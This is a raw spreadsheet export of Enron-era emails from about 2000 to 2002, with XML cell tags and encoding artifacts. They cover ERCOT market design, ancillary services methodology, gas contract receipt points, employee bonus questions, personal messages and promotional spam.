Please feel free to call with any concerns. Believe me, I'm having just as _x000D_
hard of a time working through this as you all are._x000D_
_x000D_
Sue_x000D_
_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
_x000D_
_x000D_
_x000D_
	"Alaywan, Ziad" &lt;ZAlaywan@caiso.com&gt;_x000D_
	02/21/2001 01:12 PM_x000D_
		 _x000D_
		 To: "Mara, Sue" &lt;Susan.J.Mara@enron.com&gt;, "Mara, Sue" &lt;smara@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: Enron's recent filing at ERCOT_x000D_
_x000D_
_x000D_
Sue:_x000D_
_x000D_
Is this true????_x000D_
_x000D_
ziad_x000D_
-----Original Message-----_x000D_
From: Alex Papalexopoulos [mailto:alexp@eccointl.com]_x000D_
Sent: Friday, February 09, 2001 6:30 PM_x000D_
To: Alaywan, Ziad; Atkins, Sean; Kristov, Lorenzo; Kelley, Kristen;_x000D_
Rothleder, Mark; Greenleaf, Steve; Hawk, Dianne; Farrokh Rahimi; Rahimi,_x000D_
Farrokh (external); Mason, Tim; Sheffrin, Anjali; Casey, Keith; Woertz,_x000D_
Byron; Fluckiger, Kellan; Rahman, Brian; Schmid, Elena; Robinson, Charlie;_x000D_
Traweek, Nancy; Leuze, Eric; Gerber, Spence; Willis, Mark; Kasarjian,_x000D_
Vicken; Angelidis, George; Tong Wu; Roger Treinen_x000D_
Subject: FW: Enron's recent filing at ERCOT_x000D_
_x000D_
_x000D_
FYI:_x000D_
_x000D_
I thought you may find this interesting........._x000D_
_x000D_
Enron, one of the main advocates of the zonal/flowgate model, has a change_x000D_
of heart.  After putting their weight behind the zonal model since 1995, now_x000D_
they are abandoning it unceremoniously. I talked to Richard Tabors today and_x000D_
he confirmed that Enron, his main client, has turned around 180 degrees on_x000D_
this issue. It is all the work of Ron McNamara, a key Enron person in the_x000D_
ERCOT and the Eastern ISO markets. In fact Enron is bringing next week to_x000D_
the PUCT hearings in Texas no other than Bill Hogan himself. ERCOT is way_x000D_
down the path of the zonal model and they have almost completed the_x000D_
implementation of the zonal model, but these recent developments add_x000D_
substantial uncertainty to the final outcome of that market._x000D_
_x000D_
Alex_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Shams Siddiqi [mailto:shams_siddiqi@hotmail.com]_x000D_
Sent: Friday, February 09, 2001 8:49 AM_x000D_
To: Gregory Ioanidis_x000D_
Cc: Andy Vesey_x000D_
Subject: Enron's recent filing at ERCOT_x000D_
_x000D_
_x000D_
Hi Gregory,_x000D_
_x000D_
Attached is Enron's recent PUCT filing on the ERCOT Protocols. This has to_x000D_
be the greatest (shameless) turnaround that I've seen. The reason I say_x000D_
shameless is that during the congestion management development sessions in_x000D_
ERCOT, they wouldn't even let us discuss PJM-like market structures and_x000D_
actually succeeded in making "PJM" a dirty word in these sessions._x000D_
_x000D_
Anyway, I thought you might find the attached interesting._x000D_
_x000D_
Regards,_x000D_
Shams_x000D_
_x000D_
 - 23220_143 feb5 enron's reply brief.tif_x000D_
 - 23220_125 jan26 enron's brief.tif_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 23:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.pereira@enron.com', 'lia.halstead@enron.com', 'robin.barbe@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Robin called NYPA.  The transport contract has been amended and the only 2 _x000D_
receipt points on the contract are Mamou and Henry.  _x000D_
_x000D_
Bummer._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 11/29/2000 07:29 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
11/28/2000 10:44 AM_x000D_
To: Susan W Pereira/HOU/ECT@ECT, Robin Barbe/HOU/ECT@ECT, Lia _x000D_
Halstead/NA/Enron@ENRON_x000D_
cc: Edward Terry/HOU/ECT@ECT, Tricia Spence/HOU/ECT@ECT, Victor _x000D_
Lamadrid/HOU/ECT@ECT _x000D_
Subject: NYPA_x000D_
_x000D_
Unofficially, according to Transco, NYPA has 4 receipt points on their FT-NT _x000D_
contract.  Transco gave me the receipt volumes in MCF's and I used a 1.035 _x000D_
Btu factor.  I can't _x000D_
_x000D_
Point  Volume MCF  dts _x000D_
Henry  12,336   12,768_x000D_
Mamou  7,849   8,124_x000D_
Carthage 4,934   5,107_x000D_
Ada  7,401   7,660  (at the east end on the north LA lateral leg in TGT Zone _x000D_
1) _x000D_
_x000D_
   Total  33,659_x000D_
_x000D_
My numbers must be off a little somewhere because NYPA's MDQ is 30,840 dts, _x000D_
grossed up for fuel of 7.62%, the receipt volume is 33,384 dts.  To my _x000D_
knowledge, we have never used ADA (which I know nothing about) or Carthage._x000D_
_x000D_
Currently we are giving NYPA half their volume at Mamou (off TGT) and half at _x000D_
Henry.  At the very least we should be able to switch these volumes around to _x000D_
better suit our needs._x000D_
_x000D_
Please note, I have not mentioned any of this to Stacey at NYPA.  The only _x000D_
information Stacey was able to provide was her delivered MDQ and her grossed _x000D_
up receipt volume.  She relies on us to tell her how much gas she is getting _x000D_
at each point._x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 15:32:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: EOL and Clickpaper Approvals: 10-5-01</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lebrocq, Wendi  _x000D_
Sent:	Friday, October 05, 2001 4:53 PM_x000D_
To:	Lambert, Karen; Jones, Tana; Schott, Samuel; Brackett, Debbie R.; Clark, Cynthia; Enron Europe Global CounterParty,; Sever, Stephanie; Moran, Tom; Clark, Claudia; Bradford, William S.; Lees, Lisa; Fayett, Juana; Morse, Jana; Le, Trang; Maley, Paul; O'day, Karen; Rohauer, Tanya; Lombardi, Kelly; Lindsay, Brian; EOL Call Center; Hare, Bill D.; Heffernan, Amy; Lafuze, Molly; Clark, Danny; Panus, Stephanie; Mandola, Teresa; Ebow, Amber; Coleman, Tandra; Campbell, Lesli; Lebrocq, Wendi; Taylor, Mark E (Legal); Lauer, Kara; Banner, Kimberly; Mcquade, Jennifer; George, Fraisy; Guillory, Michael; Rajaram, Aparna; Monterrey, Maribel; Lebeau, Maria; Escamilla, Albert; Curry, Ken_x000D_
Subject:	EOL and Clickpaper Approvals: 10-5-01_x000D_
_x000D_
_x000D_
_x000D_
Please see attached._x000D_
_x000D_
 _x000D_
Regards,_x000D_
_x000D_
Wendi LeBrocq_x000D_
3-3835_x000D_
</t>
  </si>
  <si>
    <t>John Buchanan - Oncall Memorial Day</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	John Buchanan - Oncall Memorial Day_x000D_
_x000D_
Date:		5/28/2001_x000D_
Time:		7:00 AM - 8:00 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 05:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'ron.mcnamara@enron.com', 'smith.day@enron.com', 'clint.dean@enron.com', 'martin.lin@enron.com', 'jean.ryall@enron.com', 'michelle.parks@enron.com', 'christi.nicolay@enron.com', 'mike.curry@enron.com', 'thane.twiggs@enron.com'})</t>
  </si>
  <si>
    <t>ERCOT Ancillary Services Methodology</t>
  </si>
  <si>
    <t xml:space="preserve">There are several items worth noting regarding the ERCOT's methodology:_x000D_
_x000D_
Regulation Reserve Requirements (RGRS).  ERCOT has determined that 600 MW o=_x000D_
f=20_x000D_
Reg up and down will be adequate for 95% of the hours during the year, if=_x000D_
=20_x000D_
historic patterns hold and if balancing energy is deployed properly.  Durin=_x000D_
g=20_x000D_
what ERCOT considers to be "high stress" periods, they will increase their=_x000D_
=20_x000D_
normal RGRS requirement by a multiple of 2-3.  The initial start-up of the=_x000D_
=20_x000D_
single control area will  be considered "high stress" and ERCOT will purcha=_x000D_
se=20_x000D_
2-3 what is necessary to cover the inexperience of the operators.  This wil=_x000D_
l=20_x000D_
be the practice until ERCOT is comfortable with the single control area (or=_x000D_
=20_x000D_
until market participants complain about the high cost of A/S).  The high=_x000D_
=20_x000D_
stress option will remain available for the first year of operations._x000D_
Non-Spinning Reserve Requirements (NSRS).  ERCOT proposes to a methodology =_x000D_
of=20_x000D_
purchasing NSRS only when projected risk of insufficiency is higher than=20_x000D_
normal, or large amounts of spinning reserve are not projected to be=20_x000D_
available online based on resource plans..  This boils down to where the=20_x000D_
temperature is projected to be greater than 92 degrees, less than 32 degree=_x000D_
s=20_x000D_
Fahrenheit or uncertain and when spinning reserves less than 4600 MW are=20_x000D_
projected.  Here is the process:_x000D_
  1. Review the weather forecast for the next day and see if it differs=20_x000D_
significantly from the current day._x000D_
  2. If the next day forecast is =01&amp;similar=018 to the current day forecas=_x000D_
t, and=20_x000D_
the current day forecast high temperature is &lt;92, and the current    day lo=_x000D_
w=20_x000D_
temperature is greater than 32 degrees, and the current day generation plan=_x000D_
=20_x000D_
shows &gt;4600 MW of spinning reserve online    all day long, and the current=_x000D_
=20_x000D_
month is not April, May, or October, THEN no NSRS is considered to be=20_x000D_
required all day for the next    day._x000D_
  3. Else: Purchase NSRS using the following:_x000D_
  ? If the current month is April, May or October, then purchase NSRS in=20_x000D_
amounts equal to the largest unit online for the hours     projected within=_x000D_
=20_x000D_
80% of peak hour._x000D_
  ? If today=01,s and tomorrow=01,s ERCOT high temperature is projected abo=_x000D_
ve 92=20_x000D_
degrees, then purchase NSRS in amounts equal to the    largest unit online=_x000D_
=20_x000D_
for the hours projected warmer than 92 degrees._x000D_
  ? If tomorrow=01,s low temperature forecast is projected below 30 degrees=_x000D_
,=20_x000D_
then purchase NSRS in amounts equal to the largest unit    online for the=_x000D_
=20_x000D_
projected morning load pickup hours and hours projected within 80% of peak=_x000D_
=20_x000D_
hour._x000D_
   Purchase amounts of NSRS equal to the largest unit online for hours in=_x000D_
=20_x000D_
which the Day Ahead operator estimates spinning reserves    online will dro=_x000D_
p=20_x000D_
lower than 4600 MW._x000D_
Replacement Reserve Requirements (RPRS).  The requirement will be set at th=_x000D_
e=20_x000D_
amount of RPRS required to resolve supply inadequacy, CSC, and OC (local)=_x000D_
=20_x000D_
congestion simultaneously.  There will be procurement of RPRS if the resour=_x000D_
ce=20_x000D_
plans indicate capacity inadequacy based on the QSE scheduled load  with th=_x000D_
e=20_x000D_
ERCOT projected load.  If the ERCOT projected load is greater than the QSE=_x000D_
=20_x000D_
scheduled load and capacity available in the resource plan does not cover t=_x000D_
he=20_x000D_
difference, then there is a capacity inadequacy problem.  If the CSC flows=_x000D_
=20_x000D_
based on the QSE schedules are greater than the limits, then the CSC proble=_x000D_
ms=20_x000D_
are recorded.  Then a transmission contingency analysis will be run to=20_x000D_
identify OC constraints.  If the flows are greater than the limits, the OC=_x000D_
=20_x000D_
flow values are recorded.  When there are insufficient RPRS bids for ERCOT =_x000D_
to=20_x000D_
resolve its reliability and security concerns, ERCOT may choose to request=_x000D_
=20_x000D_
OOM capacity or to use RMR units.  ERCOT will use the scheduling pricing=20_x000D_
dispatch (SPD) to determine which OOM and RMR units should be selected and=_x000D_
=20_x000D_
when to discontinue OOM/RMR service._x000D_
Balancing Energy Requirement.  ERCOT's goal for balancing energy is (1) to=_x000D_
=20_x000D_
use BES so that regulation service in either direction is not depleted, (2)=_x000D_
=20_x000D_
to minimize net energy in regulation, and (3) to provide frequency control=_x000D_
=20_x000D_
when frequency is high, especially during minimum load intervals.  ERCOT wi=_x000D_
ll=20_x000D_
use a two-step approach to calculate balancing energy service needs.  Step=_x000D_
=20_x000D_
one will be to clear the balancing energy service market resolving=20_x000D_
load-generation balances and Zonal congestion (local congestion is ignored)=_x000D_
. =20_x000D_
Step two is to determine the balance energy service needs to resolve local=_x000D_
=20_x000D_
congestion as well as generation-load balance and zonal congestion.   The=_x000D_
=20_x000D_
desired result of step two is to minimize the cost of local congestion whic=_x000D_
h=20_x000D_
will be an uplift to the market._x000D_
Balancing Energy Down Bid Percentage Requirement.  This will be used for=20_x000D_
congestion management and frequency control (to correct for high frequency)=_x000D_
. =20_x000D_
ERCOT will evaluate the export amount of each congestion management zone an=_x000D_
d=20_x000D_
transmission transfer capability between CM Zones.  If the export amount is=_x000D_
=20_x000D_
greater than the calculated transfer capability of a CM Zone, then the=20_x000D_
difference between these two values is the potential congested MW, or the=_x000D_
=20_x000D_
total MW of DES Down bids needed for clearing Zonal Congestion.  Also=20_x000D_
sufficient down bid percentage requirement will be determined by ERCOT. =20_x000D_
Market rules dictate that by 0600 of the day ahead QSEs will be notified of=_x000D_
=20_x000D_
this percentage requirement for BES down bids by Congestion Zone._x000D_
Responsive Reserve Requirement (RRS).  The RRS requirement is set at 2300 M=_x000D_
W=20_x000D_
for all hours under normal conditions.  Interruptible responsive reserve=20_x000D_
cannot exceed 25% of the QSE total requirement.=20_x000D_
_x000D_
For the initial start-up period of the market, ERCOT will have the tendency=_x000D_
=20_x000D_
to over buy ancillary services while the are "adjusting" to the single=20_x000D_
control area._x000D_
_x000D_
_x000D_
Thane Thomas Twiggs_x000D_
Enron Corp_x000D_
1400 Smith Street_x000D_
Houston, Texas 77002_x000D_
_x000D_
713-853-3199 Voice_x000D_
713-408-4463 Mobile_x000D_
713-646-8272 Fax_x000D_
877-968-8967 Digital Pager or 8779688967@skytel.com_x000D_
----- Forwarded by Thane Twiggs/ENRON_DEVELOPMENT on 04/10/2001 04:59 PM --=_x000D_
---_x000D_
_x000D_
=09Thane Twiggs_x000D_
=0904/10/2001 03:42 PM_x000D_
=09=09=20_x000D_
=09=09 To: Doug Gilbert-Smith/Corp/Enron@ENRON, Clint Dean/Corp/Enron@Enron=_x000D_
, Smith=20_x000D_
L Day/HOU/ECT@ECT, Eric Saibi/Corp/Enron@ENRON, Mike Curry/Enron@EnronXGate=_x000D_
,=20_x000D_
Martin Lin/Contractor/Enron Communications@Enron Communications, Ron=20_x000D_
McNamara/NA/Enron@Enron, Thane Twiggs/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Jean Ryall/NA/Enron@ENRON, Michelle Parks/Enron@EnronXGate, Christi L=20_x000D_
Nicolay/HOU/ECT@ECT_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: ERCOT Ancillary Services Methodology_x000D_
_x000D_
The attached file was large so I will provide the link to the ERCOT website=_x000D_
. =20_x000D_
If  you cannot down load and would like a hard copy, let me know.=20_x000D_
_x000D_
http://www.ercot.com/currents.htm  -- It is under Ancillary Services=20_x000D_
Methodologies._x000D_
_x000D_
Thane Thomas Twiggs_x000D_
Enron Corp_x000D_
1400 Smith Street_x000D_
Houston, Texas 77002_x000D_
_x000D_
713-853-3199 Voice_x000D_
713-408-4463 Mobile_x000D_
713-646-8272 Fax_x000D_
877-968-8967 Digital Pager or 8779688967@skytel.com_x000D_
----- Forwarded by Thane Twiggs/ENRON_DEVELOPMENT on 04/10/2001 03:38 PM --=_x000D_
---_x000D_
_x000D_
=09Thane Twiggs_x000D_
=0904/10/2001 03:04 PM_x000D_
=09=09=20_x000D_
=09=09 To: Doug Gilbert-Smith/Corp/Enron@ENRON, Clint Dean/Corp/Enron@Enron=_x000D_
, Smith=20_x000D_
L Day/HOU/ECT@ECT, Eric Saibi/Corp/Enron@ENRON, Mike Curry/Enron@EnronXGate=_x000D_
,=20_x000D_
Martin Lin/Contractor/Enron Communications@Enron Communications, Ron=20_x000D_
McNamara/NA/Enron@Enron, Thane Twiggs/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Jean Ryall/NA/Enron@ENRON, Michelle Parks/Enron@EnronXGate, Christi L=20_x000D_
Nicolay/HOU/ECT@ECT_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: ERCOT Ancillary Services Methodology_x000D_
_x000D_
Attached is the proposed ERCOT ISO methodology for determining A/S=20_x000D_
Purchases.  The methodologies will be presented to the ERCOT Board for=20_x000D_
approval April 17, 2001._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thane Thomas Twiggs_x000D_
Enron Corp_x000D_
1400 Smith Street_x000D_
Houston, Texas 77002_x000D_
_x000D_
713-853-3199 Voice_x000D_
713-408-4463 Mobile_x000D_
713-646-8272 Fax_x000D_
877-968-8967 Digital Pager or 8779688967@skytel.com_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 02:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.jackson@enron.com'})</t>
  </si>
  <si>
    <t>TURN Document</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Jeff,_x000D_
_x000D_
We got this off the TURN web site._x000D_
_x000D_
Mark Jackson_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:43:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'administrator@midwestdirectories.com'})</t>
  </si>
  <si>
    <t>2001 Worldwide Gas Utility Industry Directory</t>
  </si>
  <si>
    <t>20% PRE-PUBLICATION DISCOUNT!!!_x000D_
_x000D_
Midwest Publishing Company's 2001 Worldwide Gas Utility Industry Directory will be available for shipment on or about November 30, 2001. It will be the most accurate, comprehensive, and complete industry directory available!_x000D_
_x000D_
ORDER NOW AND SAVE $29 PER DIRECTORY!!!  (list price $145)_x000D_
_x000D_
Midwest Publishing Company offers you a 20% prepublication discount on all paid orders for a Worldwide Gas Utility Industry Directory and a Worldwide Pipeline Industry Directory received before November 30, 2001!_x000D_
_x000D_
Midwest Publishing Company - Since 1943!_x000D_
PO Box 4468_x000D_
Tulsa, OK  74159-0468_x000D_
Phone: 918-583-2033_x000D_
Fax: 918-587-9349_x000D_
 _x000D_
Contact:  Will Hammack, Publisher at 800-829-2002 or will@midwestdirectories.com &lt;mailto:will@midwestdirectories.com&gt;_x000D_
 _x000D_
Product Info:  www.midwestdirectories.com &lt;http://www.midwestdirectories.com&gt;_x000D_
 _x000D_
To Place an Order - Mail or Fax This Form:  www.midwestdirectories.com/order.pdf &lt;http://www.midwestdirectories.com/order.pdf&gt;_x000D_
 _x000D_
or Email Information to:  orders@midwestdirectories.com &lt;mailto:orders@midwestdirectories.com&gt;</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 04:37:01 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/29/02; HourAhead hour: 7;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/29/02; HourAhead hour: 7;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002012907.txt</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 03:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.oldenhuis@enron.com', 'dave.neubauer@enron.com', 'chuck.wilkinson@enron.com', 'rockey.storie@enron.com', 'john.dushinske@enron.com', 'mike.ullom@enron.com', 'courtney.barker@enron.com', 'michael.ratner@enron.com', 'steve.klimesh@enron.com', 'ld.stephens@enron.com', 'mike.mcgowan@enron.com', 'tk.lohman@enron.com', 'yuan.tian@enron.com', 'lon.stanton@enron.com', 'kevin.hyatt@enron.com', 'tim.johanson@enron.com', 'penny.mccarran@enron.com', 'christine.stokes@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'steven.harris@enron.com', 'stephen.herber@enron.com', 'david.marye@enron.com', 'steve.weller@enron.com', 'rob.wilson@enron.com', 'sarabeth.smith@enron.com', 'lorraine.lindberg@enron.com', 'julie.mccoy@enron.com', 'bill.mangels@enron.com', 'michael.stage@enron.com', 'gary.sova@enron.com', 'jeffery.fawcett@enron.com', 'john.goodpasture@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'sebastian.corbacho@enron.com'})</t>
  </si>
  <si>
    <t>WEFA Report on Future of Gas Turbines for Power</t>
  </si>
  <si>
    <t xml:space="preserve">Note:  WEFA has made some interesting points in their conclusions of this _x000D_
study.  _x000D_
_x000D_
Gas Turbines Headed for a 50% Meltdown_x000D_
_x000D_
High natural gas prices, performance issues and higher than expected _x000D_
maintenance costs, a general economic slowdown and several other key factors _x000D_
will combine to create a "near-term meltdown in the gas turbine market," _x000D_
according to a report by WEFA, Inc. _x000D_
_x000D_
Reporting on a study about to be published by the analysis and consulting _x000D_
firm based in Eddystone, PA, one of its authors predicted "a substantial _x000D_
short-term correction in the gas turbine market..which could render 50% of _x000D_
current North American projects uneconomic." Jason Makansi, principal of _x000D_
Makansi &amp; Co., pointed to other factors, such as the inexperience of many _x000D_
generating companies with the hedging and trading skills necessary to _x000D_
optimize profits in the peaking market, the rise of "stealth capacity" from _x000D_
refitted or otherwise optimized coal and nuclear plants, "gas transportation _x000D_
bottlenecks and persistent issues with safety and explosions," and "a _x000D_
protracted quasi-regulatory quagmire." _x000D_
_x000D_
Under the heading of stealth capacity, "old assets are being purchased or _x000D_
merged into new electric economy organizations that will improve capacity _x000D_
factors at coal-fired plants from the typical 60-65% to perhaps 80-85% within _x000D_
five years." A major part of the gain will come simply from operating the _x000D_
assets to serve the market and not just a single service territory, Makansi _x000D_
said. He reported on the soon-to-be released study at WEFA's World Economic _x000D_
Conference last week in New York. _x000D_
_x000D_
The nuclear industry is experiencing a similar transformation. Several years _x000D_
ago predictions were that as much as one-third of nuclear plants would soon _x000D_
be retired. Today, with many units sold to new owners and re-licensed, it _x000D_
appears the retirement rate will be more like 5-10% and productivity for the _x000D_
remaining units will be increased. _x000D_
_x000D_
The WEFA report points to a "technological correction" for the advanced _x000D_
technology "F-Class" turbines going into most new plants today, as unexpected _x000D_
problems crop up with extended use. There are a host of problems in the _x000D_
technology area, which can be met, but at a cost: the new units may not meet _x000D_
emissions targets without impacting efficiency, heat rate and durability; _x000D_
fuel-switching is not living up to its advance billing; units may not perform _x000D_
as well at high ambient temperatures; overhauls are required more frequently _x000D_
than had been expected; maintenance costs also are exceeding expectations; _x000D_
and fuel quality is becoming an issue. _x000D_
_x000D_
"Variable O&amp;M costs at some projects with F-class machines are running as _x000D_
high as $25,000 to $30,000 per start. Considering that some of these machines _x000D_
may exhibit several hundred starts in a year, you have a variation of that _x000D_
worn phrase, "a start here, a start there, pretty soon you're talking about _x000D_
real money!" _x000D_
_x000D_
"The bottom line of all this is that many of the claimed performance _x000D_
advantages of the gas turbine have been lost or severely eroded." Makansi _x000D_
also pointed to similar experiences with gas turbines in the U.K., Asia, _x000D_
Australia, and Chile. He predicted a turbine market correction "and an _x000D_
unavoidable plateau to work out technological kinks, modify designs and _x000D_
inject reality into business models. We believe all this will push _x000D_
consolidation in the generation sector of the electricity industry even _x000D_
faster." Makansi predicted about half a dozen major players will control 50% _x000D_
of the generation capacity in the U.S. within five to 10 years. _x000D_
_x000D_
Co-authors of the report include Robert Swanekamp, a principal of Competitive _x000D_
Power Resources; engineering consultant Jeffrey J. Fassett; and Kemm Farney, _x000D_
vice president, WEFA Electric Power Service. For more information go to _x000D_
www.wefa.com. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SF trip</t>
  </si>
  <si>
    <t>Hey Guz, just trying to touch base before you leave. What time are you_x000D_
flying in tomorrow am or pm?  Let me know so I can figure out what time to_x000D_
come out to meet you and Burns.  I get off at 4:30 on Wednesday so i was_x000D_
thinking that I would just cruise out there right after work but that is_x000D_
sort of why I need to know what time you are flying in.  wednesday is the_x000D_
best day for me to come out but if need be I can skip my soccer game on_x000D_
Thursday and come out.  Fill me in on the details and give me a number where_x000D_
I can reach you.  Make sure that you bring my cell phone number with you so_x000D_
that you can get a hold of me when you get in town.  Have you talked to_x000D_
Burns to figure anything out yet. Let me know!!_x000D_
See you soon, lot so love, kim_x000D_
Call me sometime today if you get a chance or else I will call your cell_x000D_
from later today!!_x000D_
Cheers, little woody!!_x000D_
(925) 487-6195 cell_x000D_
(925) 846-9423 home_x000D_
_______________________________________________________________________________x000D_
________x000D_
Get more from the Web.  FREE MSN Explorer download : http://explorer.msn.com</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 23:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mrmslane@aol.com'})</t>
  </si>
  <si>
    <t>Re: Richard</t>
  </si>
  <si>
    <t xml:space="preserve">That was our original plan---at this point I have no way of knowing---but I _x000D_
would guess that we would be arriving Fri morning. My life is not my own _x000D_
right now because of the crisis in California. Last night, I was named as the _x000D_
Enron rep. to the Pacific Gas &amp; Energy creditors committee--a totally _x000D_
thankless and time-consuming job. I may be leaving for CA tonight. Either _x000D_
way, Julie will be ther on Fri._x000D_
_x000D_
_x000D_
_x000D_
	Mrmslane@aol.com_x000D_
	04/10/2001 08:12 PM_x000D_
		 _x000D_
		 To: Richard.B.Sanders@enron.com_x000D_
		 cc: _x000D_
		 Subject: Richard_x000D_
_x000D_
_x000D_
are yall coming down for Thursday night....I heard that yall were from Steve._x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Dec 1999 05:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brenda.fletcher@enron.com', 'judy.townsend@enron.com'})</t>
  </si>
  <si>
    <t>Tetco 7c's</t>
  </si>
  <si>
    <t>I have updated the Tetco 7c usage tickets to include fuel.</t>
  </si>
  <si>
    <t>Mon, 31 Dec 2001 10:53:29 -0800 (PST)</t>
  </si>
  <si>
    <t>Bonus and Options</t>
  </si>
  <si>
    <t>Louise,_x000D_
_x000D_
- It has come to my attention that some groups (back office) have been told that each individual within their group can elect to be part of the Estate or of NewCo. This is surprising to me. No such election has been offered to anyone in EnronOnline (nor do I think it would make sense to offer that), but before I tell people they do not have a choice, I wanted to check with you.  - ?_x000D_
_x000D_
- On the issue of bonuses: The numbers we put together made sense to me in the context of an annual  bonus with some element of retention mixed in. According to the auctions documents I looked at, retention is identified as being for a 1 year period, with 1/2 of the amount paid up front and 1/2 one year later. If this is the case, it significantly changes the complexion (i.e. more like a retention payment with an element of bonus, rather than bonus with an element of retention) and we should revisit the numbers._x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Sun, 3 Jun 2001 17:17:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'members@netflip.com'})</t>
  </si>
  <si>
    <t>andrew.h.lewis - Never pay your phone bill again!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
	  andrew.h.lewis's Earnings: $0.00 [IMAGE]		_x000D_
 NetFlip Home 	 Home   &amp;nbsp |    My Account  [IMAGE]	logobarrightend	_x000D_
		[IMAGE]	_x000D_
_x000D_
_x000D_
[IMAGE]			_x000D_
[IMAGE]	 look here:    Dear andrew.h.lewis,    Call  it the Phone Bill Eliminator!    Here's the scoop! You can get 2 1/2 hours of free long  distance every month, when you sign up with Dial Free Calls.  That's every month! What's more-you can reduce your bill down  to $0, just by viewing offers, referring friends or joining  programs. In fact 50% of Dial Free members have never received a  bill!   [IMAGE]bullet[IMAGE]  Get $2.00 Cash  - Dial Free Calls!  [IMAGE]bullet[IMAGE]  Win $50,000  - NetFlip Sweepstakes!   	[IMAGE]	_x000D_
_x000D_
_x000D_
  			_x000D_
[IMAGE]			_x000D_
[IMAGE]	Line [IMAGE]Get   $2.00   Cash!     Line look here: [IMAGE]   Dial Free Calls!       Don't like to pay for your phone? You don't have to!   [IMAGE]      Dial  Free Calls essentially pays for your phone bill in exchange  for a bit of your time. Regardless, when you sign up with Dial Free  Calls, you'll get 2 1/2 hours of free long distance every month!  The  service is free and there are no minimums. Your calls will be crystal  clear because they'll be carried over the MCI/Worldcom or Global  Crossings networks!   By  not having to pay for phone service, you'll save hundreds of dollars  a year! You'll also make a quick $2.00 from NetFlip!  [IMAGE]   Get free Cell Phone service too! [IMAGE]  NextCard!  [IMAGE] Get $14.00 Cash!   click here  [IMAGE]   [IMAGE] 	[IMAGE] 	_x000D_
_x000D_
_x000D_
  			_x000D_
Transparent Pixel			_x000D_
leftmargin	Line Transparent PixelWin $50,000!  Line look here: Transparent Pixel   NetFlip's Newest Sweepstakes!     Imagine for a minute what you could do with $50,000.  You could buy a convertible Corvette.  Or spend a week in an ancient castle  in Scotland.  How about telling your boss that  you're going on a vacation - for a year?   Transparent Pixel    Transparent Pixel   Win $50,000!  Transparent Pixel   Win $50,000!  Transparent Pixel   Win $50,000!  Transparent Pixel Maybe you'd choose something more practical. That's okay.  Whatever you can imagine, you can have it, with $50,000 cash from NetFlip.   Transparent Pixel Transparent PixelbulletTransparent Pixel  Enter to win $50,000!      As always, the more  Fast Cash offers you complete the more chances you have to win!  	Transparent Pixel	_x000D_
_x000D_
_x000D_
Transparent Pixel	go to top of email 	_x000D_
leftmargin	LineNetFlip  Welcomes all of your comments and questions! Please send your email to  feedback@NetFlip.com .    If you no longer wish to be informed of exclusive cash offers via email, you can remove yourself from our mailing list at any time by clicking  here .   	_x000D_
_x000D_
_x000D_
Transparent Pixel		_x000D_
	Line	_x000D_
Transparent Pixel		_x000D_
	NetFlip Welcomes all of your comments  and questions! Send us email at  feedback@NetFlip.com .    We respect your privacy. If you no longer  wish to be informed of exclusive cash offers  via email, you can permanently remove yourself  from our mailing list at any time by clicking here . 	_x000D_
Tracking Pixel		_x000D_
_x000D_
_x000D_
Bottom Bar	_x000D_
_x000D_
_x000D_
[IMAGE]	 NetFlip 	&amp;nbsp&amp;nbsp? 2001	_x000D_
_x000D_
